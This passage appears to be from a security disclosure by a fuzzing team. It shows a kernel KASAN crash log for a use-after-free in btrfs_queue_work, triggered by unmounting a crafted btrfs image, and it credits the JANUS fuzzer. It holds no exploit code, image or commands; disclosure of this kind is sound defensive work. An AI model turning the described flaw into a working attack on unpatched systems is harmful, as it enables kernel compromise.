[  272.825171]  ? btrfs_queue_work+0x2c1/0x390
[  272.825171]  btrfs_queue_work+0x2c1/0x390
[  272.825171]  ? __kasan_kmalloc+0xd5/0xf0
[  272.825171]  btrfs_wq_submit_bio+0x1cd/0x240
[  272.825171]  btree_submit_bio_hook+0x18c/0x2a0
[  272.825171]  ? btree_csum_one_bio.isra.42+0x300/0x300
[  272.825171]  ? btrfs_wq_submit_bio+0x240/0x240
[  272.825171]  submit_one_bio+0x1be/0x320
[  272.825171]  flush_write_bio.isra.41+0x2c/0x70
[  272.825171]  btree_write_cache_pages+0x3bb/0x7f0
[  272.825171]  ? write_one_eb+0x680/0x680
[  272.825171]  ? set_next_entity+0x388/0x1d50
[  272.825171]  ? __switch_to_asm+0x41/0x70
[  272.825171]  ? __switch_to_asm+0x35/0x70
[  272.825171]  ? __switch_to_asm+0x42/0x70
[  272.825171]  ? __switch_to_asm+0x35/0x70
[  272.825171]  ? __switch_to_asm+0x41/0x70
[  272.825171]  ? __switch_to_asm+0x35/0x70
[  272.825171]  ? __switch_to_asm+0x41/0x70
[  272.825171]  ? __switch_to_asm+0x35/0x70
[  272.825171]  ? syscall_return_via_sysret+0xf/0x7f
[  272.825171]  ? __switch_to_asm+0x41/0x70
[  272.825171]  ? __switch_to_asm+0x35/0x70
[  272.825171]  ? __switch_to_asm+0x41/0x70
[  272.825171]  ? __switch_to_asm+0x35/0x70
[  272.825171]  ? __switch_to_asm+0x41/0x70
[  272.825171]  ? __switch_to_asm+0x35/0x70
[  272.825171]  ? __switch_to_asm+0x41/0x70
[  272.825171]  ? compat_start_thread+0x70/0x70
[  272.825171]  ? __switch_to_asm+0x41/0x70
[  272.825171]  ? __switch_to_asm+0x35/0x70
[  272.825171]  ? __switch_to_asm+0x41/0x70
[  272.825171]  ? finish_task_switch+0x17f/0x590
[  272.825171]  ? __switch_to_asm+0x41/0x70
[  272.825171]  ? __switch_to_asm+0x35/0x70
[  272.825171]  do_writepages+0x5c/0x130
[  272.825171]  __writeback_single_inode+0xa3/0x9a0
[  272.825171]  writeback_single_inode+0x23d/0x390
[  272.825171]  write_inode_now+0x1b5/0x280
[  272.825171]  ? sync_inode_metadata+0xd0/0xd0
[  272.825171]  iput+0x2ef/0x600
[  272.825171]  close_ctree+0x341/0x750
[  272.825171]  ? transaction_kthread+0x400/0x400
[  272.825171]  ? dispose_list+0x180/0x180
[  272.825171]  ? dput+0x29c/0x3c0
[  272.825171]  generic_shutdown_super+0x126/0x370
[  272.825171]  kill_anon_super+0x31/0x50
[  272.825171]  btrfs_kill_super+0x36/0x2b0
[  272.825171]  deactivate_locked_super+0x80/0xc0
[  272.825171]  deactivate_super+0x13c/0x150
[  272.825171]  ? super_setup_bdi+0xa0/0xa0
[  272.825171]  cleanup_mnt+0x9a/0x130
[  272.825171]  task_work_run+0x11a/0x1b0
[  272.825171]  exit_to_usermode_loop+0x107/0x130
[  272.825171]  do_syscall_64+0x1e5/0x280
[  272.825171]  ? page_fault+0x8/0x30
[  272.825171]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  272.825171] RIP: 0033:0x7f4d61200d77
[  272.825171] Code: 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 31 f6 e9 09 00 00 00 66 0f1f 84 00 00 00 00 00 b8 a6 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d f1 00 2b 00 f7 d8 64 89 01 48
[  272.825171] RSP: 002b:00007ffc2b474258 EFLAGS: 00000246 ORIG_RAX: 00000000000000a6
[  272.825171] RAX: 0000000000000000 RBX: 0000560b26f40080 RCX: 00007f4d61200d77
[  272.825171] RDX: 0000000000000001 RSI: 0000000000000000 RDI: 0000560b26f44940
[  272.825171] RBP: 0000560b26f44940 R08: 0000560b26f43e10 R09: 0000000000000015
[  272.825171] R10: 00000000000006b4 R11: 0000000000000246 R12: 00007f4d61702e64
[  272.825171] R13: 0000000000000000 R14: 0000560b26f40260 R15: 00007ffc2b4744e0
[  272.825171]
[  272.825171] Allocated by task 1889:
[  272.825171]  __kasan_kmalloc+0xd5/0xf0
[  272.825171]  btrfs_alloc_workqueue+0x54/0x280
[  272.825171]  open_ctree+0x2c30/0x7065
[  272.825171]  btrfs_mount_root+0xc94/0x1060
[  272.825171]  mount_fs+0xd0/0x320
[  272.825171]  vfs_kern_mount+0x5f/0x310
[  272.825171]  btrfs_mount+0x206/0x1185
[  272.825171]  mount_fs+0xd0/0x320
[  272.825171]  vfs_kern_mount+0x5f/0x310
[  272.825171]  do_mount+0x35b/0x2720
[  272.825171]  ksys_mount+0x79/0xc0
[  272.825171]  __x64_sys_mount+0xb5/0x150
[  272.825171]  do_syscall_64+0x8c/0x280
[  272.825171]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  272.825171]
[  272.825171] Freed by task 1922:
[  272.825171]  __kasan_slab_free+0x132/0x180
[  272.825171]  kfree+0x99/0x1c0
[  272.825171]  btrfs_stop_all_workers+0x8e/0x3e0
[  272.825171]  close_ctree+0x300/0x750
[  272.825171]  generic_shutdown_super+0x126/0x370
[  272.825171]  kill_anon_super+0x31/0x50
[  272.825171]  btrfs_kill_super+0x36/0x2b0
[  272.825171]  deactivate_locked_super+0x80/0xc0
[  272.825171]  deactivate_super+0x13c/0x150
[  272.825171]  cleanup_mnt+0x9a/0x130
[  272.825171]  task_work_run+0x11a/0x1b0
[  272.825171]  exit_to_usermode_loop+0x107/0x130
[  272.825171]  do_syscall_64+0x1e5/0x280
[  272.825171]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  272.825171]
[  272.825171] The buggy address belongs to the object at ffff888067cf6840
[  272.825171]  which belongs to the cache kmalloc-16 of size 16
[  272.825171] The buggy address is located 8 bytes inside of
[  272.825171]  16-byte region [ffff888067cf6840, ffff888067cf6850)
[  272.825171] The buggy address belongs to the page:
[  272.825171] page:ffffea00019f3d80 count:1 mapcount:0 mapping:ffff88806cc01b40 index:0xffff888067cf6c40
[  272.825171] flags: 0x100000000000200(slab)
[  272.825171] raw: 0100000000000200 ffffea00019f3ac0 0000001100000011 ffff88806cc01b40
[  272.825171] raw: ffff888067cf6c40 0000000080800072 00000001ffffffff 0000000000000000
[  272.825171] page dumped because: kasan: bad access detected
[  272.825171]
[  272.825171] Memory state around the buggy address:
[  272.825171]  ffff888067cf6700: fb fb fc fc fb fb fc fc fb fb fc fc fb fb fc fc
[  272.825171]  ffff888067cf6780: fb fb fc fc fb fb fc fc fb fb fc fc fb fb fc fc
[  272.825171] >ffff888067cf6800: fb fb fc fc 00 00 fc fc fb fb fc fc fb fb fc fc
[  272.825171]                                               ^
[  272.825171]  ffff888067cf6880: fb fb fc fc 00 00 fc fc 00 00 fc fc 00 00 fc fc
[  272.825171]  ffff888067cf6900: 00 00 fc fc 00 00 fc fc 00 00 fc fc 00 00 fc fc
[  272.825171] ==================================================================
[  272.825171] Disabling lock debugging due to kernel taint

Conclusion

umount after some operations(with crafted image) can cause use-after-free in btrfs_queue_work function.

It can be used as malicious way.

Discoverer

Team bobfuzzer

Acknowledgments

This Project used ported version(to 5.0.21 and 5.3.14 linux kernel) of filesystem fuzzer 'JANUS' which developed by GeorgiaTech Systems Software & Security Lab(SSLab)

Thank you for the excellent fuzzer and paper below.

You can’t perform that action at this time.